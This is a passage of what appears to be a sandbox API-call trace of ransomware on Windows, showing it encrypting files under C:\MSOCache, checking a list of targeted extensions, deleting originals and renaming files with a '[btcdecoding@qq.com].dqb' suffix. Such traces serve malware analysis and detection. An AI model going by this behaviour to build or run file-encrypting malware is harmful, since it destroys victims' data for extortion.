1 [0042.405] ReadFile (in: hFile=0x184, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.616] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.616] WriteFile (in: hFile=0x184, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0042.634] SetEndOfFile (hFile=0x184) returned 1 [0042.634] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x401a4f8 [0042.636] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.636] WriteFile (in: hFile=0x184, lpBuffer=0x401a4f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x401a4f8*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.637] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.637] WriteFile (in: hFile=0x184, lpBuffer=0x401a4f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x401a4f8*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.978] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.978] WriteFile (in: hFile=0x184, lpBuffer=0x401a4f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x401a4f8*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.981] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x401a4f8 | out: hHeap=0x570000) returned 1 [0042.981] CloseHandle (hObject=0x184) returned 1 [0042.982] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0042.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.982] lstrlenW (lpString=".doc") returned 4 [0042.982] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.982] lstrlenW (lpString=".docx") returned 5 [0042.982] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.982] lstrlenW (lpString=".pdf") returned 4 [0042.982] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.982] lstrlenW (lpString=".xls") returned 4 [0042.982] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.982] lstrlenW (lpString=".xlsx") returned 5 [0042.982] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.982] lstrlenW (lpString=".ppt") returned 4 [0042.982] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.982] lstrlenW (lpString=".zip") returned 4 [0042.982] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.982] lstrlenW (lpString=".rar") returned 4 [0042.982] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.982] lstrlenW (lpString=".bz2") returned 4 [0042.982] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.982] lstrlenW (lpString=".7z") returned 3 [0042.982] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.982] lstrlenW (lpString=".dbf") returned 4 [0042.982] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.982] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString=".1cd") returned 4 [0042.983] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString=".jpg") returned 4 [0042.983] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString=".doc") returned 4 [0042.983] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.983] lstrlenW (lpString=".docx") returned 5 [0042.983] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.983] lstrlenW (lpString=".pdf") returned 4 [0042.983] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.983] lstrlenW (lpString=".xls") returned 4 [0042.983] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.983] lstrlenW (lpString=".xlsx") returned 5 [0042.983] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.983] lstrlenW (lpString=".ppt") returned 4 [0042.983] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString=".zip") returned 4 [0042.983] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.983] lstrlenW (lpString=".rar") returned 4 [0042.983] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.983] lstrlenW (lpString=".bz2") returned 4 [0042.983] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.983] lstrlenW (lpString=".7z") returned 3 [0042.983] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString=".dbf") returned 4 [0042.983] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.983] lstrlenW (lpString=".1cd") returned 4 [0042.983] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.984] lstrlenW (lpString=".jpg") returned 4 [0042.984] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.984] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0042.984] lstrlenW (lpString="GrooveMUI.msi") returned 13 [0042.984] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.313] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=2507776) returned 1 [0043.313] CloseHandle (hObject=0x174) returned 1 [0043.313] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020 [0043.313] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.313] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0043.630] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.630] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.630] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.630] ReadFile (in: hFile=0x174, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.634] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.634] ReadFile (in: hFile=0x174, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.643] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.643] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.643] ReadFile (in: hFile=0x174, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.657] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.657] WriteFile (in: hFile=0x174, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0043.672] SetEndOfFile (hFile=0x174) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f02070 [0043.676] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.676] WriteFile (in: hFile=0x174, lpBuffer=0x3f02070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f02070*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.678] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.678] WriteFile (in: hFile=0x174, lpBuffer=0x3f02070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f02070*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.683] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.683] WriteFile (in: hFile=0x174, lpBuffer=0x3f02070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f02070*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.685] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f02070 | out: hHeap=0x570000) returned 1 [0043.686] CloseHandle (hObject=0x174) returned 1 [0043.686] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0043.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.686] lstrlenW (lpString=".doc") returned 4 [0043.686] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.686] lstrlenW (lpString=".docx") returned 5 [0043.686] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0043.686] lstrlenW (lpString=".pdf") returned 4 [0043.686] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.686] lstrlenW (lpString=".xls") returned 4 [0043.686] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.686] lstrlenW (lpString=".xlsx") returned 5 [0043.686] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0043.686] lstrlenW (lpString=".ppt") returned 4 [0043.686] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.686] lstrlenW (lpString=".zip") returned 4 [0043.686] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.686] lstrlenW (lpString=".rar") returned 4 [0043.686] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.686] lstrlenW (lpString=".bz2") returned 4 [0043.686] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.686] lstrlenW (lpString=".7z") returned 3 [0043.686] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.687] lstrlenW (lpString=".dbf") returned 4 [0043.687] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.687] lstrlenW (lpString=".1cd") returned 4 [0043.687] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.687] lstrlenW (lpString=".jpg") returned 4 [0043.687] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.687] lstrlenW (lpString=".doc") returned 4 [0043.687] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.687] lstrlenW (lpString=".docx") returned 5 [0043.687] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0043.687] lstrlenW (lpString=".pdf") returned 4 [0043.687] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.687] lstrlenW (lpString=".xls") returned 4 [0043.687] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.687] lstrlenW (lpString=".xlsx") returned 5 [0043.687] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0043.687] lstrlenW (lpString=".ppt") returned 4 [0043.687] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.687] lstrlenW (lpString=".zip") returned 4 [0043.687] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.687] lstrlenW (lpString=".rar") returned 4 [0043.687] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.687] lstrlenW (lpString=".bz2") returned 4 [0043.687] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.801] lstrlenW (lpString=".7z") returned 3 [0043.801] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.801] lstrlenW (lpString=".dbf") returned 4 [0043.801] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.801] lstrlenW (lpString=".1cd") returned 4 [0043.801] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76 [0043.801] lstrlenW (lpString=".jpg") returned 4 [0043.801] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.801] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0043.801] lstrlenW (lpString="msvcr90.dll") returned 11 [0043.801] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.562] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=655872) returned 1 [0044.562] CloseHandle (hObject=0x20c) returned 1 [0044.562] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020 [0044.562] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.563] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.563] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.563] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.563] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0044.563] GetLastError () returned 0x0 [0044.563] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xa0200, lpOverlapped=0x0) returned 1 [0044.650] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xa0210, lpOverlapped=0x0) returned 1 [0044.663] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.663] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.663] SetEndOfFile (hFile=0x214) returned 1 [0044.663] CloseHandle (hObject=0x214) returned 1 [0044.664] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.664] SetEndOfFile (hFile=0x20c) returned 1 [0044.669] CloseHandle (hObject=0x20c) returned 1 [0044.669] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.669] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1 [0044.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.669] lstrlenW (lpString=".doc") returned 4 [0044.669] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.670] lstrlenW (lpString=".docx") returned 5 [0044.670] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0044.670] lstrlenW (lpString=".pdf") returned 4 [0044.670] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.670] lstrlenW (lpString=".xls") returned 4 [0044.670] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.670] lstrlenW (lpString=".xlsx") returned 5 [0044.670] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0044.670] lstrlenW (lpString=".ppt") returned 4 [0044.670] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.670] lstrlenW (lpString=".zip") returned 4 [0044.670] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.670] lstrlenW (lpString=".rar") returned 4 [0044.670] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.670] lstrlenW (lpString=".bz2") returned 4 [0044.670] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.670] lstrlenW (lpString=".7z") returned 3 [0044.670] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.670] lstrlenW (lpString=".dbf") returned 4 [0044.670] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.670] lstrlenW (lpString=".1cd") returned 4 [0044.670] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.670] lstrlenW (lpString=".jpg") returned 4 [0044.670] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.671] lstrlenW (lpString=".doc") returned 4 [0044.671] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString=".docx") returned 5 [0044.671] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0044.671] lstrlenW (lpString=".pdf") returned 4 [0044.671] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString=".xls") returned 4 [0044.671] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString=".xlsx") returned 5 [0044.671] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0044.671] lstrlenW (lpString=".ppt") returned 4 [0044.671] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.671] lstrlenW (lpString=".zip") returned 4 [0044.671] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString=".rar") returned 4 [0044.671] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.671] lstrlenW (lpString=".bz2") returned 4 [0044.671] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.671] lstrlenW (lpString=".7z") returned 3 [0044.671] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.671] lstrlenW (lpString=".dbf") returned 4 [0044.671] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.671] lstrlenW (lpString="C:\\MSOCache\\All 